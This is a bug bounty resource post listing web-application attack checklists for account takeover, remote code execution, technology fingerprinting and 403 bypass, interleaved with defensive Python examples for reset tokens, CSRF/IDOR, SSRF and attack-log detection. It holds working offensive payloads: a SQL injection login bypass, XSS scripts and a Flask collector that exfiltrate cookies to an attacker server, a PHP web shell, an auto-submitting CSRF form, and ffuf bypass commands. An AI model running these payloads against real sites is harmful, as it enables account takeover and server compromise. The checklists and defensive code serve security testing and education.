Bugbounty Resources

This post collects bug bounty resources for finding vulnerabilities in web applications.
Account Takeover Checklist

login:
- check if you are able to brute force the password
- test for OAuth misconfigurations
- check if you are able to brute force the login OTP
- check for JWT misconfigurations
- test for SQL injection to bypass authentication, e.g. the classic payload:

```sql
admin" or 1=1;--
```

- check if the application validates the OTP or token

password reset:
- check if you are able to brute force the password reset OTP
- test for token predictability
- test for JWT misconfigurations
- check if the password reset endpoint is vulnerable to IDOR
- check if the password reset endpoint is vulnerable to Host header injection
- check if the password reset endpoint leaks the token or OTP in the HTTP response
- check if the application validates the OTP or token
- test for HTTP Parameter Pollution (HPP)
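From the defender's side, the checks above map onto a handful of properties of the reset flow. The following Python is an added example written for this post, not code from the original page or any project it links; the `ResetTokenStore` class and its in-memory dicts are a hypothetical stand-in for the application's database, and `CANONICAL_BASE_URL` is a constructed value. It shows a token that cannot be predicted or brute-forced, stored only as a digest, bound to the account it was issued for, short-lived, single-use, with a capped verification budget, and a reset link built from a configured canonical base URL rather than the request's Host header.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional

TOKEN_TTL_SECONDS = 15 * 60   # reset tokens are short-lived
MAX_ATTEMPTS = 5              # verification budget per user before lockout
# Canonical origin set by the operator (constructed value). Building the link
# from this, never from the request's Host header, defeats Host header injection.
CANONICAL_BASE_URL = "https://app.example.com"


class ResetTokenStore:
    """Hypothetical store; the dicts stand in for database tables."""

    def __init__(self) -> None:
        self._records: dict = {}   # sha256(token) -> {user_id, expires, used}
        self._attempts: dict = {}  # user_id -> failed verifications

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: str, now: Optional[float] = None) -> str:
        """Create a token for user_id and return it once, for the e-mail link."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG: not guessable
        # Only the digest is stored, so a leaked table yields no usable tokens.
        self._records[self._digest(token)] = {
            "user_id": user_id,
            "expires": now + TOKEN_TTL_SECONDS,
            "used": False,
        }
        return token

    def reset_link(self, token: str) -> str:
        return f"{CANONICAL_BASE_URL}/reset-password?token={token}"

    def verify(self, user_id: str, presented: str, now: Optional[float] = None) -> bool:
        """True exactly once, for the right user, before expiry, within the attempt budget."""
        now = time.time() if now is None else now
        attempts = self._attempts.get(user_id, 0)
        if attempts >= MAX_ATTEMPTS:
            return False  # brute-force budget spent; the user must request a new token
        # Look the token up by digest: the raw token is never stored or compared.
        record = self._records.get(self._digest(presented))
        ok = (
            record is not None
            and not record["used"]
            and record["expires"] > now
            # Token bound to the account it was issued for: a valid token for
            # user A cannot reset user B (the IDOR item on the checklist).
            and hmac.compare_digest(record["user_id"].encode(), user_id.encode())
        )
        if ok:
            record["used"] = True               # single use
            self._attempts.pop(user_id, None)
        else:
            self._attempts[user_id] = attempts + 1
        return ok
```

The same attempt budget is what protects a short numeric OTP: a 6-digit code is trivially guessable unless tries per issued code are capped and the code is discarded after the cap or after expiry. The handler should also return the same response whether the token was wrong, expired or issued to another user, so the failure reason is not leaked.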

XSS to Account Takeover:
- if the application does not use an auth token, or you can't access the cookies because of the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password
- try to exfiltrate the cookies (see the cookie exfiltration PoC near the end of this post)
- try to exfiltrate the auth token
- if the cookie's "domain" attribute is set, search for XSS in the subdomains and use it to exfiltrate the cookies

PoC Example:

```html
<script>
/* this script creates a hidden <img> element; when the browser tries to load
   the image, the victim's cookies are sent to your server */
var new_img = document.createElement('img');
new_img.src = "http://yourserver/" + document.cookie;
new_img.style = 'display: none;';
document.body.appendChild(new_img);
</script>
```

CSRF to Account Takeover:
- check if the email update endpoint is vulnerable to CSRF
- check if the password update endpoint is vulnerable to CSRF
- PoC Example: see the CSRF PoC HTML near the end of this post

IDOR to Account Takeover:
- check if the email update endpoint is vulnerable to IDOR
- check if the password change endpoint is vulnerable to IDOR
- check if the password reset endpoint is vulnerable to IDOR
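A hardened email-update handler that covers the IDOR checks above together with the CSRF checks in the preceding section. This is an added example, not code from the original post; `make_request` builds a dict standing in for a web framework's request object, and `SERVER_SECRET`, `SITE_ORIGIN` and the account table are constructed values. A cross-site form post of the kind shown in the CSRF PoC near the end of this post carries no token and a foreign `Origin`, so it is refused; a request that supplies another user's id is refused because the target account is always the one in the session.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # per-deployment secret (constructed here)
SITE_ORIGIN = "https://example.com"       # constructed site origin
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def csrf_token(session_id: str) -> str:
    """Per-session token derived from the session id; needs no server-side table."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def origin_ok(headers: dict) -> bool:
    """Defence in depth: a cross-site form post carries the attacker's Origin."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    referer = headers.get("Referer")
    if referer is not None:
        return referer == SITE_ORIGIN or referer.startswith(SITE_ORIGIN + "/")
    return False  # neither header on a state-changing request: fail closed


def csrf_check(request: dict) -> bool:
    if request["method"] not in STATE_CHANGING:
        return True
    if not origin_ok(request["headers"]):
        return False
    presented = request["form"].get("csrf_token", "")
    expected = csrf_token(request["session"]["id"])
    # compare_digest on bytes: constant time and safe for non-ASCII input
    return hmac.compare_digest(presented.encode(), expected.encode())


def update_email(request: dict, accounts: dict) -> str:
    """Email-update handler hardened against both checklist items."""
    if not csrf_check(request):
        return "403 csrf check failed"
    actor = request["session"]["user_id"]
    # IDOR guard: the account being modified is always the authenticated one.
    # A client-supplied user_id is only ever allowed to equal the session's.
    target = request["form"].get("user_id", actor)
    if target != actor:
        return "403 not your account"
    accounts[actor]["email"] = request["form"]["new_email"]
    return "200 ok"


def make_request(method: str, headers: dict, form: dict,
                 user_id: str = "alice", session_id: str = "sess-alice") -> dict:
    """Hypothetical request object: what a framework would hand the handler."""
    return {"method": method, "headers": headers, "form": form,
            "session": {"id": session_id, "user_id": user_id}}


# Constructed account table for the demonstration.
ACCOUNTS = {"alice": {"email": "alice@example.com"}, "bob": {"email": "bob@example.com"}}
```

Pair this with `SameSite=Lax` or `Strict` on the session cookie; the token check is what protects browsers and configurations where the cookie attribute alone is not enough.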

subdomain takeover:
- first-order: check if you can take over xyz.example.com; if so, you can host any malicious code to steal users' info or cookies
- PoC Example
- second-order (broken link hijacking): if you find a broken link in a webpage (https://nonexistentlink.com/app.js) and you can take over that domain, you can host any malicious JavaScript file and use it to steal users' info or cookies
- PoC Example

Remote Code/Command Execution (RCE) Checklist

Server Side Request Forgery (SSRF) to RCE:
- if you find an SSRF, try to escalate it to RCE by interacting with internal services; to do this you can craft a Gopher payload to talk to services like MySQL (you can use Gopherus)
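On the defending side, the SSRF-to-RCE path described above is cut off by refusing every scheme except http(s) (so no gopher:// or similar) and every destination that resolves to an internal address, then connecting to the address that was checked. The following Python is an added example, not code from the original post; `constructed_resolve` and its `CONSTRUCTED_DNS` table stand in for a real DNS lookup so that it runs offline, and the blocked list is the usual private, loopback, link-local, shared and metadata ranges.

```python
import ipaddress
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # gopher://, file://, dict:// etc. are refused outright
ALLOWED_PORTS = {None, 80, 443}

# Private, loopback, link-local, shared, "this network" and the IPv6 equivalents.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

Resolver = Callable[[str], List[str]]  # hostname -> list of address strings


def is_blocked_address(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped   # ::ffff:127.0.0.1 is still loopback
    return any(ip in net for net in BLOCKED_NETWORKS)


def validate_outbound_url(url: str, resolve: Resolver) -> Tuple[bool, str]:
    """Return (allowed, reason) or (allowed, pinned_address) for the caller to use."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed url"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        ipaddress.ip_address(host)
        addresses = [host]         # literal IP: nothing to resolve
    except ValueError:
        addresses = resolve(host)  # resolve once, here, and pin the result
    if not addresses:
        return False, "host does not resolve"
    for addr in addresses:
        if is_blocked_address(addr):
            return False, f"{host} resolves to blocked address {addr}"
    # The caller must connect to this address (sending `host` in the Host
    # header) rather than resolving again, or a DNS-rebinding answer could
    # swap in an internal address after the check.
    return True, addresses[0]


# Constructed DNS table standing in for real resolution.
CONSTRUCTED_DNS = {
    "api.partner.example": ["203.0.113.10"],
    "intranet.example": ["10.0.0.5"],
    "rebind.example": ["203.0.113.20", "127.0.0.1"],
}


def constructed_resolve(host: str) -> List[str]:
    return CONSTRUCTED_DNS.get(host, [])
```

The check is only as good as the HTTP client behind it: redirects must not be followed automatically, since each hop is a new URL that has to pass the same validation.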

File Upload to RCE:
- if you find an unrestricted file upload vulnerability, try to upload a malicious file to get a reverse shell
- PoC Example:

```php
<?php system($_GET["cmd"]); ?>
```

Dependency Confusion Attack:
- search for packages that may be used internally by your target, then register a malicious public package with the same name (you can use the confused tool)

Server Side Template Injection (SSTI) to RCE:
- if you find an SSTI you can exploit it with tplmap to get RCE

SQL Injection to RCE:
- if you find an SQL injection, you can craft a special query to write an arbitrary file on the system (SQL Injection shell)

LaTeX Injection to RCE:
- if you find a web-based LaTeX compiler, test whether it is vulnerable to RCE (LaTeX to command execution)

Local File Inclusion (LFI) to RCE:

Insecure deserialization to RCE:
- check if the application is vulnerable to insecure deserialization
- how to identify if the app is vulnerable:
  - try to find out the language used to build the application
  - learn about the methods used to serialize and deserialize data in this language
  - by analyzing the data that comes from the application you can identify the method
- try to craft a special payload to get RCE
- check this cheatsheet
- Java Deserialization Scanner: a Burp Suite plugin to detect and exploit Java deserialization vulnerabilities
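For the "analyze the data to identify the method" step, each of the common native serializers has a recognisable stream header. The following Python is an added example, not from the original post or the cheatsheet it links: a classifier that checks a request parameter or cookie value in its raw form, URL-decoded, and after a base64 layer against those headers. Run over inbound traffic by a defender, it locates the places where the application accepts native serialized objects (the candidates to replace with a data-only format such as JSON, or to authenticate with an HMAC before deserializing). `CONSTRUCTED_PARAMS` holds constructed sample values.

```python
import base64
import binascii
import pickle   # dumps only, to construct a sample value below
import re
from typing import Dict, Optional
from urllib.parse import unquote_to_bytes


# Documented stream headers of the common native serializers.
def _java(b: bytes) -> bool:          # java.io.ObjectOutputStream magic + version 5
    return b.startswith(b"\xac\xed\x00\x05")

def _pickle(b: bytes) -> bool:        # PROTO opcode, protocols 2-5
    return len(b) >= 2 and b[0] == 0x80 and 2 <= b[1] <= 5

def _ruby_marshal(b: bytes) -> bool:  # Marshal format 4.8
    return b.startswith(b"\x04\x08")

def _php(b: bytes) -> bool:           # serialize() object or array
    return re.match(rb'^(O:\d+:"[^"]+":\d+:\{|a:\d+:\{)', b) is not None

def _dotnet(b: bytes) -> bool:        # BinaryFormatter SerializationHeaderRecord
    return b.startswith(b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00")

SIGNATURES = [
    ("java-serialization", _java),
    ("python-pickle", _pickle),
    ("ruby-marshal", _ruby_marshal),
    ("php-serialize", _php),
    ("dotnet-binaryformatter", _dotnet),
]


def _base64_layers(value: bytes):
    """Yield the value itself, then its base64 decoding (standard or URL-safe alphabet)."""
    yield value
    stripped = value.strip()
    padded = stripped + b"=" * (-len(stripped) % 4)
    for altchars in (None, b"-_"):
        try:
            decoded = base64.b64decode(padded, altchars=altchars, validate=True)
        except (binascii.Error, ValueError):
            continue
        if decoded:
            yield decoded


def identify_serialized(value) -> Optional[str]:
    """Name the serialization format a parameter value carries, or None."""
    raw = value.encode("latin-1", "replace") if isinstance(value, str) else value
    for candidate in (raw, unquote_to_bytes(raw)):
        for layer in _base64_layers(candidate):
            for name, matches in SIGNATURES:
                if matches(layer):
                    return name
    return None


def scan_parameters(params: Dict[str, object]) -> Dict[str, str]:
    """Map parameter name -> detected format for every value that looks serialized."""
    findings = {}
    for name, value in params.items():
        fmt = identify_serialized(value)
        if fmt:
            findings[name] = fmt
    return findings


# Constructed sample parameters: five native-serialized values and three benign ones.
CONSTRUCTED_PARAMS = {
    "session": base64.b64encode(b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap").decode(),
    "state": base64.urlsafe_b64encode(pickle.dumps({"constructed": True}, protocol=4)).decode(),
    "cart": 'O:8:"stdClass":1:{s:5:"total";i:42;}',
    "prefs": base64.b64encode(b"\x04\x08[\x06i\x06").decode(),
    "viewstate": base64.b64encode(
        b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x0c").decode(),
    "q": "search term",
    "filter": "%7B%22page%22%3A1%7D",      # URL-encoded JSON, benign
    "sig": "YWJjZGVmZ2hpamtsbW5vcA==",     # base64 of plain text, benign
}
```

A hit tells you where a serialized object crosses a trust boundary; whether that spot is exploitable still depends on the classes available on the other side, which is what the scanner plugin above is for.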

Web Applications Fingerprinting tools

Wappalyzer

BuiltWith

httpx
- you can use the -web-server and -tech-detect options

```bash
# a single domain
echo example.com | httpx -web-server -tech-detect
# a list of subdomains
cat subdomains_list.txt | httpx -web-server -tech-detect
httpx -l subdomains_list.txt -web-server -tech-detect
```
Aquatone
- Aquatone is a tool for visual inspection of websites across a large number of hosts and is convenient for quickly gaining an overview of the HTTP-based attack surface.

```bash
cat hosts.txt | aquatone
```

nuclei

```bash
nuclei -t ~/nuclei-templates -tags tech -u https://example.com -c 200
```

whatweb

```bash
# a single host
whatweb example.com
# a list of hosts
whatweb --input-file=hosts.txt
```

Error messages
- you can identify technologies via error messages: if a web app does not handle errors and you send it malformed data, the data will cause an error, and the error may reveal the back-end technology.

```http
POST / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*
Content-type: application/json
Content-Length: 8

{"test":d
```

- fuzzing HTTP methods

```http
METHOD /ENDPOINT HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*
```

```bash
ffuf -w http_methods.txt:METHOD -w endpoints.txt:ENDPOINT -request http_request.txt
```

- fuzzing HTTP headers

```http
GET /ENDPOINT HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*
```

```bash
ffuf -w http_headers_names.txt:NAME -w http_headers_values.txt:VALUE -w endpoints.txt:ENDPOINT -request http_request.txt -H "NAME: VALUE"
```
403 - Bypass

FFUF
- Path fuzzing

```bash
ffuf -w 403_url_payloads.txt -u http://example.com/auth_pathFUZZ -fc 403,401,400
```

- HTTP Header Fuzzing

```bash
ffuf -w 403_bypass_header_names.txt:HEADER -w 403_bypass_header_values.txt:VALUE -u http://example.com/auth_path -H "HEADER:VALUE" -fc 403,401,400
```

- Common HTTP Ports Fuzzing

```bash
ffuf -w common-http-ports.txt:PORT -u http://example.com/auth_path -H "Host: example.com:PORT" -fc 403,401,400
```

- HTTP Methods Fuzzing

```bash
ffuf -w http-methods.txt:METHOD -u http://example.com/auth_path -X "METHOD" -fc 403,401,400
```

- User Agent Fuzzing

```bash
ffuf -w user-agents.txt:AGENT -u http://example.com/auth_path -H "User-Agent: AGENT" -fc 403,401,400
```
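Every one of the fuzzing runs above leaves a distinctive footprint in the web server's access log: a burst of 400/401/403/405 responses to one protected path from one client, spread across varied methods, path encodings and user agents. The following Python is an added example, not from the original post; it parses combined-log-format lines (the `CONSTRUCTED_LOG` sample is made up, including its `fuzzer/1.0` user agent) and raises one alert per client and target when a 60-second window exceeds the thresholds.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
DENIED = {400, 401, 403, 405}   # what a bypass fuzzer mostly gets back
WINDOW_SECONDS = 60
MIN_DENIED = 5                  # denied hits to one target from one client in a window
MIN_VARIANTS = 3                # distinct (method, raw path, user agent) combinations


def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "client": m["client"],
        "time": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
        "agent": m["agent"],
    }


def target_of(path: str) -> str:
    """Collapse /auth_path, /auth_path/, /auth_path%2f and /auth_path/.. onto one target."""
    first = unquote(path.split("?", 1)[0]).strip("/").split("/")[0]
    return "/" + first


def detect_403_probing(lines: List[str]) -> List[Dict]:
    denied = defaultdict(list)  # (client, target) -> denied events
    for line in lines:
        ev = parse_line(line)
        if ev and ev["status"] in DENIED:
            denied[(ev["client"], target_of(ev["path"]))].append(ev)

    alerts = []
    for (client, target), events in denied.items():
        events.sort(key=lambda e: e["time"])
        best: List[Dict] = []
        start = 0
        for end in range(len(events)):
            # slide `start` forward so events[start:end+1] spans at most WINDOW_SECONDS
            while (events[end]["time"] - events[start]["time"]).total_seconds() > WINDOW_SECONDS:
                start += 1
            window = events[start:end + 1]
            if len(window) > len(best):
                best = window
        variants = {(e["method"], e["path"], e["agent"]) for e in best}
        if len(best) >= MIN_DENIED and len(variants) >= MIN_VARIANTS:
            alerts.append({
                "client": client,
                "target": target,
                "denied": len(best),
                "methods": sorted({e["method"] for e in best}),
                "first_seen": best[0]["time"].isoformat(),
            })
    return alerts


# Constructed sample: one client probing /auth_path, one ordinary visitor.
CONSTRUCTED_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /auth_path HTTP/1.1" 403 153 "-" "fuzzer/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /auth_path/ HTTP/1.1" 403 153 "-" "fuzzer/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /auth_path%2f HTTP/1.1" 403 153 "-" "fuzzer/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /auth_path/.. HTTP/1.1" 400 226 "-" "fuzzer/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "POST /auth_path HTTP/1.1" 403 153 "-" "fuzzer/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "TRACE /auth_path HTTP/1.1" 405 157 "-" "fuzzer/1.0"
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /auth_path HTTP/1.1" 403 153 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
198.51.100.3 - - [10/Oct/2023:13:55:40 +0000] "GET /auth_path HTTP/1.1" 403 153 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Oct/2023:13:55:41 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
```

Header fuzzing (`X-Forwarded-For`, `X-Original-URL` and the like) is invisible in the default log format, so log the headers the access control actually consults, and treat a 200 following such a burst as the event worth paging on.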
nuclei (403 bypass templates)

```bash
nuclei -u http://example.com/auth_path/ -t 403-bypass-nuclei-templates -tags fuzz -timeout 10 -c 200 -v
```

Note: add the slash after the path whether it is a directory or a file.
Example:
Source:

Cookie exfiltration PoC (server-side collector and client-side script), belonging to the "XSS to Account Takeover" section above:

```python
#!/usr/bin/python3
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def cookie_sniffer():
    # print every cookie the victim's browser sent along with the request
    for c_name, c_value in request.cookies.items():
        print(c_name + ': ' + c_value)
    return 'Hello, world'


if __name__ == '__main__':
    app.run(port=80)
```

```javascript
// send the victim's cookies to the collector as a JSON POST body
var user_cookies = { "cookies": document.cookie };
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "/store-cookies", true);
xhttp.send(JSON.stringify(user_cookies));
```

CSRF PoC (email update), belonging to the "CSRF to Account Takeover" section above:

```html
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form name='attack' action='https://example.com/update-email' method='POST'>
<input type="hidden" name="new_email" value="attacker@evil.com">
<input type="submit" name="submit" value="submit" hidden>
</form>
<script>
document.attack.submit.click()
</script>
</body>
</html>
```

Thanks for reading this post; if you like my work you can support me by buying me a coffee.